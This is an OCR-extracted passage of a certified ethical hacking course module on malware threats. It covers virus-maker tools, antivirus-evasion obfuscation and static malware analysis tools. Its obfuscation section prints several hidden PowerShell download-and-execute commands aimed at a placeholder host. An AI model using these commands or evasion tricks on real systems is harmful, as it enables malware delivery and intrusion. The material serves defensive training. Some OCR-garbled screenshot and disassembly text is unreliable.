v 2.0 DELmE’s Batch Virus Maker eI,

=

2° | Payload | other Options Local Infection Reg RuntKey | { Infec

infect All Drives

Infect Startup Folder | [ Infect Autoexecbat

es

t | [Infec Al Folders

|

| [

|

Infect "ls"Cmd

Filetype Infection Infect Al Exe Files] (Infect Al_Ink Files} (infectAl Doc Files} infect AT Fies | (infect Al Pdf Files) (_infect Al XmiFies_} InfectAl_Mp3 Fes) (“InfectAl Mp4 Files] [InfectAl_Png Files]

jemDrive’

Infect Filetype. Enter File Extension To Infect (eg ‘bt’)

(feat (fet (Gea (Gea (Gitex

{Lintect _} (_tntect_} (tte) (tea) (ites)

Intemet Spreading ‘Send To Contacts _] Sends Virus To All Contacts On Microsoft Outlook As An Email Attachment

DELmE's Batch Virus Maker Info DELmE's Batch Virus Maker.

Virus Name Veus Author

covion

Connect Trojan Fabinhoff

View Agreement} (View Credits Stat Over)

Version: 2.0 ‘Scripting Language: Autolt v3.3.0.0 Coded By: DELmE

Ee dada Nt | otetnemtesterehe nara

Please view the User Agreement by clicking the "Agreement button” and make: sure you fully understand and agree with the agreement

Figure 7.54: Screenshot of DELmE’s Batch Virus Maker

Module 07 Page 1052

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Malware Threats o

Exam 312-50 Certified Ethical Hacker

JPS Virus Maker

JPS Virus Maker tool is used to create customized viruses. It has many in-built options to create a virus. Some of the features of this tool are auto-startup, disable task manager, disable control panel, enable remote desktop, turn off Windows Defender, etc.

1x}

IPS ( Virus Maker 4.0 ) Viru:

s Options : Disable Registry

Hide Services Hide Windows

Disable MsConfig

©

x + Gi virustotalcom/gui/le/Sbb9c7 1cc58a7#3d122966d!089575a4cac573039a194220cTaStede f2d/detection

3] stsernccnarnsizanectnmnriotcacsannatiteraateta © s2engines detected thie fle

‘Sob0eT ideeSbart3a 122868eA08957Sedcoc8730390194220e7a5 tetett 2 subse? essa7tndazacccaDeRs7SotcacS7IEQB4 194220 TaStete tad ex [020170160 ve2017.8570 expo hatter nauk)

DETECTION

‘Ave (n0 os)

DETAILS

RELATIONS

«BEHAVIOR

427K 2020-08-20.08:5208 UTC a tminior ge thames a

«COMMUNITY@

@ Toojan Exploit. MSOMceWvord GenerckD.

@ cre;cve2017-8570

© Seer cve2017-8570.9

© Trojan expo MBOMRCeWord Generics

© ower ttamore-gen[i

© OtrerMolware-gon

© Exrreve-2017-8570.Gen

© woa2.eeplot HTM Downloaders

© Trojn Expiot MSOMee eed GenerckO.

© SxpRTeCve-2017.85704

© xmantatware Squibydoo 67288330

@ Marwareepazazmimotoytt

© ©¥€-2017-0199. gentcameot

© Expt Siogen 63608

Trojan Expiot MSOReeWVerd GenerickO,

© TcjanExpon MEORCeWerd GenesekD.

Explot EXPICVE-2017-8570.Gen

© Trojan DownloaderDOE Gens

HTMLBaMiner PUTA

© Troan €xpion someon ~“@

HEUR Trojan-Downtoader MSExce! Des,

© Malware (i Seore=87)

Figure 7.68: Screenshot showing the detection of LemonDuck

Module 07 Page 1079

.

| Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

The following are some additional fileless malware: =

Divergent

=

njRat Backdoor

=

DarkWatchman

=

Sodinokibi Ransomware

=

BazarBackdoor

=

Kovter and Poweliks

=

Astaroth Backdoor

=

Dridex

=

Nodersok

=

Hancitor/Chanitor

=

Vaporworm

=

Sorebrect Ransomware

Module 07 Page 1080

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Fileless Malware

Antivirus

Obfuscation Techniques to Bypass

cE H

=

Inserting Characters

@ Attackers insert special characters such as comma(,) and semicolon (;) between malicious commands and strings to make well-known commands

more complex to detect

ysemd.exe,/c, ;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression(New-Object, System.Net.WebClient) .DownloadString( ‘https: //targetwebsite.com”) &&echo exit

Inserting Parentheses |@ When parentheses are used, variablesin a code block are evaluated as a single line command. Attackers exploit this feature to split and obfuscate malicious commands emd.exe /e ((echo commandl) Prag echo command2))

Inserting Caret Symbol @ The caret symbol (*) is a reserved character used in shell commands for escaping. Attackers exploit this feature to escape malicious commands during execution time

C:\WINDOWS\system32\cmd.exe /c p**o**w*ter*r**sr*h**erA1A1**.A@**x*M@ “NOMMERit “exec bypass -nop InvokeExpression (New-Object System.Net.WebClient). DownloadString ((*https://targetwebsite.com”) &&echo,exit Al Rights Reserved, Reproduction i

Fileless Malware

Antivirus (Cont’d)

Obfuscation Techniques to Bypass

cE H

om | ane

Inserting Double Quotes @ The commandline parser uses the double quote symbolas an argument delimiter. Attackers use this symbolto concatenate malicious commandsin arguments Pow""er""Shell -N””oExit -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Flower. jpg

Using Custom Environment Variables

@ Inthe Windows operating system, environmentvariables are dynamic objects that store modifiable values used by applications at runtime. Attackers exploit environmentvariables to split malicious commands into multiple strings set a=Power féset b=Shell ££ %a:~0,-18%b% -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Products .pdf Using Pre-assigned Environment Variables ©@ “scommonProgramFiles’” containsa defaultvalue “c:\program Files\Common Files”. Specific characters from this value can be accessed through indexingand used to execute malicious commands cmd.exe /c “%CommonProgramFiles:~3,1towerShell.exe” -windowstyle hidden -command wscript myscript.vbc Rights Reserved. Reproduction i

Fileless Malware Obfuscation Techniques to Bypass Antivirus Nowadays, attackers are leveraging fileless malware to perform cyber-attacks on target organization, as such malware hides itself from traditional antivirus solutions. Furthermore, fileless malware does not store anything on the disk; hence, it is extremely difficult to detect such attacks. In addition, attackers adopt various obfuscation techniques to keep their malicious activities hidden and undetected for as long as possible.

Module 07 Page 1081 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

The various obfuscation techniques used by fileless malware to bypass antivirus solutions are discussed below: Inserting Characters Attackers insert special characters such as commas (,) and semicolons (;) between malicious commands and strings to make well-known commands more difficult to detect. These special characters are considered as whitespace characters in commandline arguments; hence, they are processed easily. Using this technique, attackers break malicious strings to evade parsing of malicious commands by signature-based solutions. ,;emd.exe,/c,;,echo;powershell.exe

Invoke-Expression

-NoExit

-exec

bypass

-nop

(New-Object

System.Net.WebClient)

.DownloadString(‘https://targetwebsite.com”)

&&echo, exit

Inserting Parentheses In general scenarios, parentheses are used to improve the readability of the code, group complex expressions, and split commands. When parentheses are used, variables of a code block are considered and evaluated just as a single-line command. Attackers exploit this feature to split and obfuscate malicious commands. emd.exe

/c

((echo

command1)

&&( echo

command2) )

Inserting Caret Symbol The caret symbol (4) is generally a reserved character used in shell commands for escaping. Attackers exploit this feature to escape malicious commands at execution time. For this purpose, they insert single or double caret symbols inside a malicious command. C: \WINDOWS\system32\cmd.exe

P**04AWA*OAAEAASAAHASEAALAAL AS AAOAAKANG nop

Invoke-Expression

-NO**EXIt

(New-Object

-exec

bypass

Ie

-

System.Net.WebClient)

DownloadString((‘https://targetwebsite.com”)

.

&&echo,exit

When the above command is executed, the first caret symbol is escaped: Cc: \WINDOWS\system32\cmd.exe No*Exit -exec bypass

Ie -nop

protwre*r*s*h*e*1*1% Invoke-Expression

System.Net.WebClient) . DownloadString((‘https://targetwebsite.com”)

After the second caret symbol command-line argument:

is also escaped,

. *e*x*e (New-Object

&&echo,exit

powershell.exe

is executed

with

a

C:\WINDOWS\system32\cmd.exe /c powershell.exe -NoExit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient) . DownloadString((‘https://targetwebsite.com”)

Module 07 Page 1082

&&echo,exit

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Inserting Double Quotes

When a command is embedded with double quotes, it does not affect the normal execution of the command. Furthermore, the command-line parser uses a double quote symbol as an argument delimiter. Attackers use double quote symbols to concatenate malicious commands in arguments. Pow’”er””Shell -N’””oExit -ExecutionPolicy -windowstyle hidden cmd /c Flower.jpg

=

bypass

-noprofile

Using Custom Environment Variables Another method adopted by attackers to obfuscate fileless malware is using environment variables. In Windows operating systems, environment variables are dynamic objects that store modifiable values used by applications at run time. Attackers exploit environment variables to split malicious commands into multiple strings. Furthermore, they set the value for the environment variable at run time to execute malicious commands. set a=Power &&set b=Shell && bypass -noprofile -windowstyle

=

%a:~0,-1%%b% -ExecutionPolicy hidden cmd /c Products.pdf

Using Pre-assigned Environment Variables Another technique exploited by attackers is retrieving specific characters from preassigned environment variables such as “®CommonProgramFiles%.” The characters in such variables are referred through the index and exploited by attackers to execute malicious commands. “%CommonProgramFiles%” contains a default value “C:\Program

Files\Common

Files.”

Specific characters from this value can be

accessed through indexing and used to execute malicious commands as follows: cmd.exe

windowstyle

/e

“$CommonProgramFiles:~3,1%owerShell.exe”

hidden

-command

wscript

-

myscript.vbc

The above command retrieves a single character ‘P’ at index 3, which is concatenated with “owerShell.exe”, and executes the malicious command.

Module 07 Page 1083

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

LO#06: Demonstrate Malware Analysis Process

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

Malware Analysis Malware such as viruses, Trojans, worms, spyware, and rootkits allow an attacker to breach security defenses and subsequently launch attacks on target systems. Thus, to find and fix existing infections and thwart future attacks, it is necessary to perform malware analysis. Many tools and techniques are available to perform such tasks.

This section explains the malware analysis procedure and discusses the various tools used to accomplish it.

Module 07 Page 1084

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

What is Sheep Dip Computer?

CE H

‘@

Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware

‘@

Asheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions

Sheep Dipping

Process Tasks

Run user, group permission, and process monitors Run port and network monitors Run device driver and file monitors

Run registry and kernel monitors

What is Sheep Dip Computer? Sheep dipping is a process used in sheep farming, whereby sheep are dipped in chemical solutions to make them parasite-free. In information security and malware analysis, sheep dipping refers to the analysis of suspicious files, incoming messages, etc., for malware. The users isolate the sheep-dipped computer from other computers on the network to block any malware from entering the system. Before performing this process, it is important to save all downloaded programs on external media such as CD-ROMs or DVDs. A computer used for sheep dipping should have tools such as port monitors, files monitors, network monitors, and one or more antivirus programs for performing malware analysis of files, applications, incoming messages, external hardware devices (such as USB and pen drive), and so on. Some tasks that are typically run during the sheep dipping process are as follows: =

Run user, group permission, and process monitors

Run port and network monitors Run device driver and file monitors Run registry and kernel monitors

Module 07 Page 1085 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Antivirus Sensor Systems

CEH

@ Anantivirus sensor system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans @ They are used along with sheep dip computers Antivirus System

gees

on

Oo antivirus

Anti-Spyware

all

| Linker Info: [6.0 Subsystem: [Wind2Gur [3] | PEID v0.95

JARNING > VIRUS —> [Worm KLEZ [Overiay]] Mult'Scan_| [Task Viewer |

[Options

| [

About

™ Stay on top

Static Malware Analysis: Identifying Packing/Obfuscation Methods (Cont'd) Detect It Easy (DIE) is an application used for determininga file's

compiler, linker, packer, etc. using signature-based detection

|

|

Exit [|

Al Rights Reserved. Re

Identifying Packing/Obfuscation Method of ELF Malware

rd

-

| [>

|

https:/jwurw ale com

C | EH Pond tthe

Packaging/Obfuscation Tools Aa

Macro Pack

be

upx

roerrnstnie ASPack

“http://www.aspack.com

@

\VMprotect ‘etps:/ompsoft.com

ps2-packer ‘ets:/fothabs.com

Identifying Packing/Obfuscation Methods Attackers use packing and obfuscation to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file and then run the unpacked file. This complicates reverse engineers’ attempts to find out the actual program logic and other metadata via static analysis.

Module 07 Page 1101 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

You should try to determine if the file includes packed elements and also locate the tool or method used for packing it. Use tools such as PEid, which detects most commonly used packers, cryptors, and compilers for PE executable files. Finding the packer will ease the task of selecting a tool for unpacking the code. PEID

Source: https://www.aldeid.com PEID is a free tool that provides details about Windows executable files. It can identify signatures associated with over 600 different packers and compilers. This tool also displays the type of packers used for packing the program. It also displays additional details such as entry point, file offset, EP section, and subsystem used for packing.

PEID v0.95

-

x

File: | E:\CEH-Tools\CEHv12 Module 07 Malware Threats \Viruses \Klez Virus L [J]

Entrypoint: | 00008458

EP Section:

[text

File Offset:

FirstBytes:

[55,88,6C,6A

[00008458

Linker Info: [6.0

>]

| >|

Subsystem: {Win32 GUI

Multi Scan | | Task Viewer

Options

“About

M Stay on top

|

[>]

ext

|

[| [2] Figure 7.73: Screenshot of PEiD

Module 07 Page 1102

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Identifying Packing/Obfuscation Method of Executable and Linkable Format (ELF) Malware =

Detect It Easy (DIE)

Source: https://github.com DIE is an application used for determining types available for Linux and macOS. It has a completely can easily add its own algorithms for detecting detects a file’s compiler, linker, packer, etc. using a

of files. Apart from Windows, it is open architecture of signatures and or modifying existing signatures. It signature-based detection method.

Figure 7.74: Screenshot of the DIE tool

The following are some additional packaging/obfuscation tools:

=

Macro_Pack (https://github.com)

=

UPX (https://upx.github.io)

=

ASPack (http://www.aspack.com)

=

VMprotect (https://vmpsoft.com)

=

ps2-packer (https://github.com)

Module 07 Page 1103

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Static Malware Analysis: Finding the Portable Executables

(PE) Information

cE H

ol

|@ The PE formatisthe executable file formatused on Windows operating systems @ Analyze the metadata of PE files to get information suchas time and date of compilation, functions imported and exported by the program, linked libraries, icons, menus, version information, and strings that are embedded in resources |@ Use tools such as PE Explorer to extractthe above-mentioned information

PE Explorer PE Explorer lets you open, view, and edit a variety of different 32-bit Windows executable file types (also called PE files) ranging from the common,

such

as EXE, DLL, and ActiveX Controls

PE Extraction Tools

© Portable Executable Scanner (pescan) (https://tzworks.net) © Resource Hacker (http://www.angusj.com) © PEView (https://www.aldeid.com)

tt: funvu heaventols com

Finding the Portable Executables (PE) Information The Portable Executable (PE) format is an executable file format used on Windows OS, which stores the information that a Windows system requires to manage the executable code. It stores metadata about the program, which helps in finding additional details of the file. For instance, the Windows binary is in PE format, and it consists of information such as time of creation and modification, import and export functions, compilation time, DLLs, linked files, strings, menus, and symbols. The PE format contains a header and sections that store metadata about the file and code mapping in an OS. The PE of a file contains the following sections: =

.text: Contains instructions and program code that the CPU executes.

=

.rdata: Contains the import and export information as well as other read-only data used by the program.

=

data: Contains the program’s global data, which the system can access from anywhere.

=

.rsrc: Consists of the resources employed by the executable, menus, and strings, as this section offers multi-lingual support.

such

as icons,

images,

You can use the header information to gather additional details of a file or program, such as its features. You can use tools such as PEView to extract the above-mentioned information.

Module 07 Page 1104

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

PE Explorer Source: http://www.heaventools.com PE Explorer lets you open, view, and edit a variety of 32-bit Windows executable file types (also called PE files) ranging from common types, such as EXE, DLL, and Activex Controls, to less familiar types, such as SCR (Screensavers), CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL, and more.

{G) PE Explorer - EACEH-Tools\CEHV12 Module 07 Malware Fle View Tools Help SHR Al Mea B-@ls|

Threats\Viruses\Klez Virus Live\face.exe |

-

a

x

°

ae

3 | Actes of Enty Pon: [OHSS] y | ReaimapeChecksun [OHT72IGR |] FieldName

DataVaue

Number of Sections a Tine Date Stamp 387868 Printer to Symbol Table 00000000 Number of Symbols cooon0ach Size of OpionalHeader——O0EOn Chaecteises o10Fh Masic 108 Linker Vetsion 00h Size of Code 000C000h Size of rialeed Data cooe900ch Size of Uriniazed Date 00000000e Addiess of Ent Point coda84sch Base of Code oonto0ch Base of Data eooeo000n Image Base cvo4ono00%

—Descipton

Feld Name Section lgnment Fe Alignment Operaing System Version Image Version Subsystem Version ‘Wind2 Version Value Size of mage Size of Headers Checksum Subsystem Di Characteristics Size of Stack Reserve Sie of Stack Commit Size of Heap Reserve Size of Heap Commit Loader Flags Numbet of Data Ditectees —

13/04/2002 01.48.44 a PER 60

DataVahe Deception oo0t000h ‘gonta00h 00000004h 40 on0v0g 00 coonogoth 40 9000000) © Reserved on0ge000h 614400 bytes ‘00001000h ‘ogen09eoh och ‘Wind2 GUI cooth ‘oovo0000h coota0oh ‘oovoo000h ‘gon1a00h (00000000 Obsolete ono000T0h

For Heb, press Fi Figure 7.75: Screenshot of PE Explorer

Some additional PE extraction tools are as follows: =

Portable Executable Scanner (pescan) (https://tzworks.net)

=

Resource Hacker (http://www.angusj.com)

=

PEView (https://www.aldeid.com)

Module 07 Page 1105 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Static Malware Analysis: Identifying File Dependencies |@ Programs need to work with internal system files to properly function in

@

Programs store the importand export functions the kernel32.dllfile

‘@

Check the dynamically linked listin the malware executable file

‘@

Findingoutall the library functions may allow you to

Dependency Walker Dependency Walker lists all the dependent modules of an executable

al diagrams. It also records all the file and builds hierarchictree functionsof each module exports and calls

estimate what the malware program cando

Use tools such as Dependency Walkerto identify the

dependencieswithin the executable file

weanegpepe|

‘@

CE H

© Dependency-check (https://jeremylong.github.io) © Snyk (https://snyk.io) © PE Explorer Dependency Scanner (http://www. peexplorer.com) © Retirels (https://retirejs.github.io)

‘BBSSEESt

Dependency Checking Tools

http://www dependencywalker.com

Identifying File Dependencies Any software program depends on various inbuilt libraries of an OS that help in performing specified actions in a system. Programs need to work with internal system files to function correctly. They store the import and export functions in a kernel32.dll file. File dependencies contain information about the internal system files that the program needs to function properly, the process of registration, and location on the machine. You need to find the libraries and file dependencies, as they contain information about the runtime requirements of an application. Subsequently, you need to check if they can find and analyze these files, as they can provide information about malware in a file. File dependencies include linked libraries, functions, and function calls. Check the dynamically linked list in the malware executable file. Finding out all the library functions may allow you to guess what the malware program can do. You should know the various dll used to load and run a program.

Some standard dlls are listed in the table below: dil

Description of contents

Kernel32.

str.txt

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Analyzing String Reuse Using Intezer

Source: https://www.intezer.com Intezer is malware analysis platform that scans files, URLs, end points, and memory dumps. It extracts strings from uploaded malware samples and identifies whether those strings are used in other files. It reduces the effort of malware analysts by analyzing unknown malware that are difficult to trace.

Figure 7.82: Screenshot of Intezer showing relevant strings

Figure 7.83: Screenshot of Intezer showing string reuse

Module 07 Page 1115 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Static Malware Analysis: Analyzing Mach Object (Mach-O) Executable Files ‘@

Mach-O is an executable file format for macOS and iOS that is similarto the PE format for Windows and ELF for Linux

@ Use tools such as pagestuff, LIEF, or otool to analyze Mach-O malware |G Use pagestuffto view Mach-O executable files and find information regarding the logical pages associated with that file Malicious Mach-O Binaries

Reverse Engineering Mach-O Binaries

Al RightsReserved. Reproduction

Analyzing Mach Object (Mach-O) Executable Files Mach object (Mach-O) is an executable file format similar to the Portable Executable (PE) format for Windows and ELF for Linux. It is associated with binaries present in macOS and iOS. This file format is used to distribute code and determines the mechanism through which the memory reads both data and code present in a binary file. Mach-O malware has a direct impact on a program’s performance because memory usage and paging activities are affected by the order of code within a binary file. This malware allows attackers to generate two arrays, which get overlapped in memory, and to set a memory location for executing a Mach-O executable. Attackers can leverage this functionality for privilege escalation and for exploiting next-stage vulnerabilities with root access.

Malicious Mach-O Binaries Mach-O can be referred to as a binary stream of bytes that are combined to form meaningful data chunks. The data include information related to the CPU type, data size, order of the bytes, etc. Mach-O binaries are arranged into different segments that comprise individual sections. These individual sections store different types of code or data. Some of the segments of a Mach-O binary are | PAGEZERO, _ TEXT, _ DATA, and __OBUC. Attackers can use these segments to hide malicious code and execute it for escalating privileges. Security privilege or otool privilege

analysts must analyze Mach-O malware to take proper mitigative measures and restrict escalation attempts in macOS systems. Analysts can use tools such as pagestuff, LIEF, to analyze Mach-O malware and take the necessary actions for the prevention of escalation.

Module 07 Page 1116

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

LIEF

Source: https://lief-project.github.io LIEF is an acronym for Library to tool developed by QuarksLab for including Mach-O binary formats. languages such as C, C++, and executable formats.

Instrument Executable Formats. It is a cross-platform parsing and manipulating different executable formats In addition, it can be used in different programming Python and can abstract the common features of

Run the following commands to obtain information on a Mach-O executable: import

lief

binary

=

print

=

lief.parse("/usr/bin/1s")

(binary)

otool

Source: https://github.com Security analysts can use otool to analyze or examine a binary and obtain information about an iOS application. They can check the binary links with a shared library using the following command: otool

-L

UnPackNw

>

~/Malware/libs.txt

e@0e@

| MacOS —

-bash

2x31

Figure 7.84: Screenshot of otool

Execute the following command to dump the method names from the Obj section of a Mach-O binary: otool

-oV

UnPackNw

>

~/Malware/methods.txt

Run the following command to acquire the disassembly: otool

-tV

UnPackNw

>

~/Malware/disassembly.txt

After executing the above command, the obfuscated file name can be found.

Module 07 Page 1117

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Malware Threats

99000001000015TF 9900000100001606 9900000100001609 900000010000160T 900000100001616 00000010000161d

Exam 312-50 Certified Ethical Hacker

m

Ox96ea(%rip), %rax, ri *0x7a99(%rip) @x7daa(%rip), @x7dc3(%rip), 0x96d4(Krip),

Srsi

Objc

selector

## Objc wrsi ## Srdi ## rex ##

message:

ref:

+[NSBundle

mainBundle mainBundlell

Objc cfstring ref: @"unpack" Objc cfstring ref: @"txt” Objc selector ref: pathForResource:ofType

900000100001624 9900000100001628

Srdi, %rax,

090000010000162F 9900000100001632 0900000100001636 00000010000163a 9000000160001640 900000100001646 900000100001649 990000010000164c 9900000100001650 9000000100001657 900000010000165b

%rcx, rsi -@x38(%rbp), %rdx -@x36(%rbp) , rex *@x7a68(%rip) ## Objc message: -[%rdi pathForResource:ofType:] $0x4, %r8d %r8d, %ecx %r8d, %r8d %rax, -0x20(%rbp) Ox9a51(Krip), %rax ## Objc class ref: _OBJC_CLASS_$_NSString -@x26(%rbp), %rdx 0x969e(Krip), %rsi ## Objc selector ref: stringWithContentsOfFi

000000010000162b

le:encoding:error

Srsi,

-0x30(%rbp) %rdi

-0x38 (%rbp)

000000100001662 900000100001665

%rax, %rdi "@x7a3d(%rip)

990000010000166b

S%rax,

900000100001676 00000010000167a 000000100001681 900000100001684

-@x28(%rbp) , rdx 0x9687(%rip), Sersi wt Objc selector ref: enncryptDecryptString: %rax, Srdi *Ox7ale(%rip) ## Objc message: +[EncodeDecodeOps enncryptDecryp

ile:encoding:error:]

@09909010000166F

tString:]

## Objc message:

+[NSString stringwithContentsOfF

-0x28 (%rbp) Ox9a3a(Krip), %rax ## Objc class ref:

EncodeDecodeOps

Figure 7.85: Screenshot of otool showing an obfuscated text file and its contents

The output of the above command can be examined line by line to analyze actual file contents and encryption methods used. Reverse Engineering Mach-O Binaries

As Mach-O binaries include different segments and their corresponding sections, security analysts must evaluate the internal structure of a binary for the identification of malicious code. Furthermore, all the methods and executable files present within the segments can be examined through the reverse engineering process to mitigate potential threats. Mach-O binary files can be analyzed using tools such as pagestuff. =

pagestuff

Source: https://github.com The pagestuff utility can be used to view Mach-O executable files and find information regarding the logical pages associated with those files. This tool has limited input parameters. Symbols such as static data structure names and functions can be viewed for individual pages of code. If no coding pages are specified, then the tool displays the symbols for all the pages within the _ TEXT, —text section. It helps identify malicious code and Objective-C methods such as deleteAppBySelf.

Module 07 Page 1118

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Run the following command to view the internal structure of binaries: pagestuff

UnpackNw

-a

Execute the following command to view segment and section names: nm

-m

UnpackNw

File Page @ contains Mach-0 headers

File Page 1 contains contents of section

(__TEXT,_ text)

File Page 2 contains contents of section

(_TEXT,

Symbols on file page 0x8800000109001579 0x@0000001090015a9 0x@0G90001080016e0 0x@000000109001790 0x@000000108001870 0x@909000100001aa0 0x@000000100001d70 0x@909000100001eD

1 virtual address @x100001570 to 6x190802000 _main -[AppDelegate applicat ionDidFinishLaunching:] -[AppDelegate deleteAppBySelf] -[AppDelegate deletPreviosApp] -[AppDelegate creatFileOnTemp: scrpName:} -[AppDelegate makeExecutableFileAtPath:] -[AppDelegate executeAppleScript: isKill:] __41-(AppDelegate executeAppleScript: isKill:]_block_invoke text)

Symbols on file page 2 virtual address @x100002000 to 6x190003000 0x@009000109002030 __41-(AppDelegate executeAppleScr ipt: isKill:]_block_invoke_2 0x@880000108002678 __copy_helper_block_ 0x@9000001000020a9 destroy _helper_block_ @x99@90001080020de __copy_helper_block_.119

0x@8G0000108002138 0x@909000109002170 0x@8800001000023b9 0x@900000108002610 0x8000000100002840 0x@0890001080028cO 0x900000100002b60 0x@800000109002ca9 0x@909000109002de9 0x@000000100002e30

_ _destroy_helper_block_.120 -[AppDelegate ReadPrefrance:] -[AppDelegate ReadPrefrance] -[AppDelegate checkOurOfferInstlled} -[AppDelegate osVersion] -[AppDelegate getPathFromAdobPlist:] -[AppDelegate fireTrackOffersInstalledForPXL:] -[AppDelegate fireTrackOffersAcceptedForPXL:] -[AppDelegate silentyTrackInMain:] -[AppDelegate silentlyFireUrl:]

File Page 3 contains contents of section

(_TEXT,

text)

Figure 7.86: Screenshot of pagestuff showing segments and sections

Module 07 Page 1119

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Static Malware Analysis: Analyzing Malicious MS Office Documents

cE H ol

Finding Suspicious Components @ Analyze the malicious Office document with oleid to detect any specific components that can be labeled as malicious/suspicious @

To use oleid, open a new terminal on the linux (Ubuntu) workstation and enter oleid

document>’



C:\Windows\System32\drivers

@ Check boot.ini or bed (bootmer) entries @ Check Windows services that are automatically started > Goto Run > Type services.msc -> Sort by Startup Type @ Check the startup folder >

C:\ProgramData\Microsoft\Windows\start

Menu\Programs\startup

‘https: //docs. microsoft.com

Startup Programs Monitoring Malware can alter the system settings and add themselves to the startup menu to perform malicious activities whenever the system starts. Therefore, scanning for suspicious startup programs manually or using startup program monitoring tools such as Autoruns for Windows is essential for detecting malware. Steps to manually detect hidden malware: =

Step 1: Check startup program entries in the registry Startup items such as programs, shortcuts, folders, and drivers are set to run automatically at startup when users log into a Windows OS (e.g., Windows 11). Startup items can be added by the programs or drivers installed, or manually by the user. Programs that run on Windows 11 startup can be located in these registry entries, such as Windows startup setting, Explorer startup setting, and IE startup setting. o

Windows Startup Setting HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Module 07 Page 1136

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

o

Explorer Startup Setting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore xr\Shell

Folders,

Common

Startup

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore x\User

Shell

Folders,

Common

Startup

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer \Shell

Folders,

Startup

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer \User

co

Shell

Folders,

Startup

IE Startup Setting

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

Explorer\Toolbar

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet

Explorer\Extensions

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet =

